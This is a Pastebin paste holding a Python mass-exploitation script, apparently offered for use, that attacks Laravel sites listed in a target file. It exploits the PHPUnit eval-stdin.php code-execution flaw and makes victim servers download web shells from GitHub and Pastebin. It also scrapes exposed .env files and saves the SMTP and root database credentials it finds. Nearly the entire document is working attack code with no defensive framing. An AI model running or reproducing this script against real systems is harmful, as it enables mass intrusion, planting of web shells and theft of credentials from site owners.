API tools faq
paste
l33tb0mb3r

Laravel rce

l33tb0mb3r
Mar 3rd, 2020
148
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.12 KB | None | 0 0
raw download clone embed print report diff
  1. import requests as r
  2. import sys
  3. import os
  4. from platform import system
  5. import threading
  6. import requests
  7. import random
  8. import datetime
  9. import re
  10. from multiprocessing import Pool
  11. from multiprocessing.dummy import Pool as ThreadPool
  12. from time import time as timer
  13.  
  14. if system() == 'Linux':
  15. os.system('clear')
  16. if system() == 'Windows':
  17. os.system('cls')
  18.  
  19.  
  20.  
  21. def rce(url):
  22. try:
  23. cekos = '<?php echo php_uname("a"); ?>'
  24. upshell = '<?php system("wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O unit.php"); ?>'
  25. url = url.strip()
  26. cek = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=cekos, timeout=50)
  27. if 'Linux' in cek.text:
  28. print("[os] " + cek.text)
  29. open('phpunitvuln.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'+'\n')
  30. r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=upshell)
  31. cekshell = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su')
  32. if 'IDBTE4M' in cekshell.text:
  33. print("[Shell Uploaded] " + url+'/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su')
  34. open('shell_phpunit.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su'+'\n')
  35. else:
  36. print("[Shell not Uploaded] : " + cekshell)
  37. else:
  38. print("[Not Vuln] : " + url)
  39. except:
  40. pass
  41.  
  42. def rce2(url):
  43. try:
  44. cekos = '<?php echo php_uname("a"); ?>'
  45. upshell = '<?php fwrite(fopen("raimu.php","w+"),file_get_contents("https://pastebin.com/raw/DWAYZwk5")); ?>'
  46. url = url.strip()
  47. cek = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=cekos, timeout=50)
  48. if 'Linux' in cek.text:
  49. print("[os] " + cek.text)
  50. open('phpunitvuln.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'+'\n')
  51. r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=upshell)
  52. cekshell = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su')
  53. if 'IDBTE4M' in cekshell.text:
  54. print("[Shell Uploaded] " + url+'/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su')
  55. open('shell_phpunit2.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su'+'\n')
  56. else:
  57. print("[Shell not Uploaded] : " + url)
  58. else:
  59. print("[Not Vuln] : " + url)
  60. except:
  61. pass
  62.  
  63. def getsmtp(url):
  64.  
  65. try:
  66. eNv = "{}/.env".format(url)
  67.  
  68. headers = {
  69. 'Connection': 'keep-alive',
  70. 'Cache-Control': 'max-age=0',
  71. 'Upgrade-Insecure-Requests': '1',
  72. 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
  73. 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  74. 'Accept-Encoding': 'gzip, deflate',
  75. 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
  76. }
  77.  
  78. rsmTP = requests.get(eNv, headers=headers, allow_redirects=True, timeout=50)
  79.  
  80. if "mailtrap.io" in rsmTP.text:
  81.  
  82. print("\033[1;31;40m")
  83.  
  84. print("[ - ] NOT FOUND SMTP [ - ] \n")
  85.  
  86. elif rsmTP.status_code == 200:
  87.  
  88. if "APP_NAME" in rsmTP.text:
  89.  
  90. open('envfound.txt', 'a').write(eNv + '\n')
  91.  
  92. print("\033[1;32;40m")
  93.  
  94. if "MAIL_HOST" in rsmTP.text:
  95.  
  96. SMTP = re.findall('MAIL_HOST=(.*)', rsmTP.text)
  97.  
  98. PORT = re.findall('MAIL_PORT=(.*)', rsmTP.text)
  99.  
  100. USERNAME = re.findall('MAIL_USERNAME=(.*)', rsmTP.text)
  101.  
  102. PASSWORD = re.findall('MAIL_PASSWORD=(.*)', rsmTP.text)
  103.  
  104. MENCRYPTION = re.findall('MAIL_ENCRYPTION=(.*)', rsmTP.text)
  105.  
  106. if "smtp.mailtrap.io" in SMTP:
  107.  
  108. print("\033[1;31;40m")
  109.  
  110. print("[ - ] NOT FOUND SMTP [ - ] \n")
  111.  
  112. elif "localhost" in SMTP:
  113.  
  114. print("\033[1;31;40m")
  115.  
  116. print("[ - ] NOT FOUND SMTP [ - ] \n")
  117.  
  118. elif "null" in SMTP:
  119.  
  120. print("\033[1;31;40m")
  121.  
  122. print("[ - ] NOT FOUND SMTP [ - ] \n")
  123.  
  124. else:
  125.  
  126. print("[ + ] FOUND SMTP [ + ]")
  127.  
  128. print("\n= = = = = = = = = = = = = = = = = = = = = = = =")
  129.  
  130. print("SMTP HOST => {}".format(SMTP[0]))
  131.  
  132. print("SMTP PORT => {}".format(PORT[0]))
  133.  
  134. print("SMTP USERNAME => {}".format(USERNAME[0]))
  135.  
  136. print("SMTP PASSWORD => {}".format(PASSWORD[0]))
  137.  
  138. print("SMTP ENCRYPTION => {}".format(MENCRYPTION[0]))
  139.  
  140. print("= = = = = = = = = = = = = = = = = = = = = = = =")
  141.  
  142. open('SMTP.txt', 'a').write('SMTP HOST : ' + SMTP[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\n')
  143.  
  144.  
  145.  
  146. elif "SMTP_HOST" in rsmTP.text:
  147.  
  148. SMTP = re.findall('SMTP_HOST=(.*)', rsmTP.text)
  149.  
  150. PORT = re.findall('SMTP_PORT=(.*)', rsmTP.text)
  151.  
  152. USERNAME = re.findall('SMTP_USERNAME=(.*)', rsmTP.text)
  153.  
  154. PASSWORD = re.findall('SMTP_PASSWORD=(.*)', rsmTP.text)
  155.  
  156. MENCRYPTION = re.findall('SMTP_ENCRYPTION=(.*)', rsmTP.text)
  157.  
  158. if "smtp.mailtrap.io" in SMTP:
  159.  
  160. print("\033[1;31;40m")
  161.  
  162. print("[ - ] NOT FOUND SMTP [ - ] \n")
  163.  
  164. elif "localhost" in SMTP:
  165.  
  166. print("\033[1;31;40m")
  167.  
  168. print("[ - ] NOT FOUND SMTP [ - ] \n")
  169.  
  170. elif "null" in SMTP:
  171.  
  172. print("\033[1;31;40m")
  173.  
  174. print("[ - ] NOT FOUND SMTP [ - ] \n")
  175.  
  176. else:
  177.  
  178. print("\n= = = = = = = = = = = = = = = = = = = = = = = =")
  179.  
  180. print("SMTP HOST => {}".format(SMTP[0]))
  181.  
  182. print("SMTP PORT => {}".format(PORT[0]))
  183.  
  184. print("SMTP USERNAME => {}".format(USERNAME[0]))
  185.  
  186. print("SMTP PASSWORD => {}".format(PASSWORD[0]))
  187.  
  188. print("SMTP ENCRYPTION => {}".format(MENCRYPTION[0]))
  189.  
  190. print("= = = = = = = = = = = = = = = = = = = = = = = =")
  191.  
  192. open('SMTP.txt', 'a').write('SMTP HOST : ' + SMTP[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\n')
  193.  
  194. elif "mailtrap.io" in rsmTP.text:
  195.  
  196. print("\033[1;31;40m")
  197.  
  198. print("[ - ] NOT FOUND SMTP [ - ] \n")
  199.  
  200. elif "DB_USERNAME=root" in rsmTP.text:
  201.  
  202. ROOTU = re.findall('DB_USERNAME=(.*)', rsmTP.text)
  203.  
  204. ROOTP = re.findall('DB_PASSWORD=(.*)', rsmTP.text)
  205.  
  206. print("[ + ] Maybe you can get VPS / DATABASE [+]")
  207.  
  208. open('VPS.txt', 'a').write('HOSTS : ' + url + '\nUSERNAME : ' + ROOTU[0] + '\nPASSWORD : ' + ROOTP[0] + '\n')
  209.  
  210.  
  211.  
  212. elif rsmTP.status_code == 302:
  213.  
  214. if "APP_NAME" in rsmTP.text:
  215.  
  216. open('envfound.txt', 'a').write(eNv + '\n')
  217.  
  218. if "MAIL_HOST" in rsmTP.text:
  219.  
  220. SMTP = re.findall('MAIL_HOST=(.*)', rsmTP.text)
  221.  
  222. PORT = re.findall('MAIL_PORT=(.*)', rsmTP.text)
  223.  
  224. USERNAME = re.findall('MAIL_USERNAME=(.*)', rsmTP.text)
  225.  
  226. PASSWORD = re.findall('MAIL_PASSWORD=(.*)', rsmTP.text)
  227.  
  228. MENCRYPTION = re.findall('MAIL_ENCRYPTION=(.*)', rsmTP.text)
  229.  
  230. if "smtp.mailtrap.io" in SMTP:
  231.  
  232. print("\033[1;31;40m")
  233.  
  234. print("[ - ] NOT FOUND SMTP [ - ] \n")
  235.  
  236. elif "localhost" in SMTP:
  237.  
  238. print("\033[1;31;40m")
  239.  
  240. print("[ - ] NOT FOUND SMTP [ - ] \n")
  241.  
  242. elif "null" in SMTP:
  243.  
  244. print("\033[1;31;40m")
  245.  
  246. print("[ - ] NOT FOUND SMTP [ - ] \n")
  247.  
  248. else:
  249.  
  250. print("[ + ] FOUND SMTP [ + ]")
  251.  
  252. print("\n= = = = = = = = = = = = = = = = = = = = = = = =")
  253.  
  254. print("SMTP HOST => {}".format(SMTP[0]))
  255.  
  256. print("SMTP PORT => {}".format(PORT[0]))
  257.  
  258. print("SMTP USERNAME => {}".format(USERNAME[0]))
  259.  
  260. print("SMTP PASSWORD => {}".format(PASSWORD[0]))
  261.  
  262. print("SMTP ENCRYPTION => {}".format(MENCRYPTION[0]))
  263.  
  264. print("= = = = = = = = = = = = = = = = = = = = = = = =")
  265.  
  266. open('SMTP.txt', 'a').write('SMTP HOST : ' + SMTP[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\n')
  267.  
  268.  
  269.  
  270.  
  271. elif "SMTP_HOST" in rsmTP.text:
  272.  
  273. SMTP = re.findall('SMTP_HOST=(.*)', rsmTP.text)
  274.  
  275. PORT = re.findall('SMTP_PORT=(.*)', rsmTP.text)
  276.  
  277. USERNAME = re.findall('SMTP_USERNAME=(.*)', rsmTP.text)
  278.  
  279. PASSWORD = re.findall('SMTP_PASSWORD=(.*)', rsmTP.text)
  280.  
  281. MENCRYPTION = re.findall('SMTP_ENCRYPTION=(.*)', rsmTP.text)
  282.  
  283. if "smtp.mailtrap.io" in SMTP:
  284.  
  285. print("\033[1;31;40m")
  286.  
  287. print("[ - ] NOT FOUND SMTP [ - ] \n")
  288.  
  289. elif "localhost" in SMTP:
  290.  
  291. print("\033[1;31;40m")
  292.  
  293. print("[ - ] NOT FOUND SMTP [ - ] \n")
  294.  
  295. elif "null" in SMTP:
  296.  
  297. print("\033[1;31;40m")
  298.  
  299. print("[ - ] NOT FOUND SMTP [ - ] \n")
  300.  
  301. else:
  302.  
  303. print("[ + ] FOUND SMTP [ + ]")
  304.  
  305. print("\n= = = = = = = = = = = = = = = = = = = = = = = =")
  306.  
  307. print("SMTP HOST => {}".format(SMTP[0]))
  308.  
  309. print("SMTP PORT => {}".format(PORT[0]))
  310.  
  311. print("SMTP USERNAME => {}".format(USERNAME[0]))
  312.  
  313. print("SMTP PASSWORD => {}".format(PASSWORD[0]))
  314.  
  315. print("SMTP ENCRYPTION => {}".format(MENCRYPTION[0]))
  316.  
  317. print("= = = = = = = = = = = = = = = = = = = = = = = =")
  318.  
  319. open('SMTP.txt', 'a').write('SMTP HOST : ' + SMTP[0] + '\nSMTP PORT : ' + PORT[0] + '\nSMTP USER : ' + USERNAME[0] + '\nSMTP PASSWORD : ' + PASSWORD[0] + '\nSMTP ENCRYPTION : ' + MENCRYPTION[0] + '\n')
  320.  
  321.  
  322. elif "DB_USERNAME=root" in rsmTP.text:
  323.  
  324. ROOTU = re.findall('DB_USERNAME=(.*)', rsmTP.text)
  325.  
  326. ROOTP = re.findall('DB_PASSWORD=(.*)', rsmTP.text)
  327.  
  328. print("[ + ] Maybe you can get VPS / DATABASE [+]")
  329.  
  330. open('VPS.txt', 'a').write('HOSTS : ' + url + '\nUSERNAME : ' + ROOTU[0] + '\nPASSWORD : ' + ROOTP[0] + '\n')
  331.  
  332. else:
  333.  
  334. print("[ - ] CAN'T FOUND BUG [ - ]")
  335.  
  336. except:
  337.  
  338. pass
  339. def robot(url):
  340. try:
  341. rce(url)
  342. rce2(url)
  343. getsmtp(url)
  344. except:
  345. pass
  346.  
  347. def main():
  348. list = open(sys.argv[1], 'r').readlines()
  349. try:
  350. ThreadPool = Pool(50)
  351. ThreadPool.map(robot, list)
  352. except:
  353. pass
  354. if __name__ == "__main__":
  355. if len(sys.argv) < 2:
  356. print("Auto Exploit Laravel by Fallaga Team respect all hacker from TN, PK ,DZ")
  357. print("Usage : python " + sys.argv[0] + " list.txt")
  358. else:
  359. main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!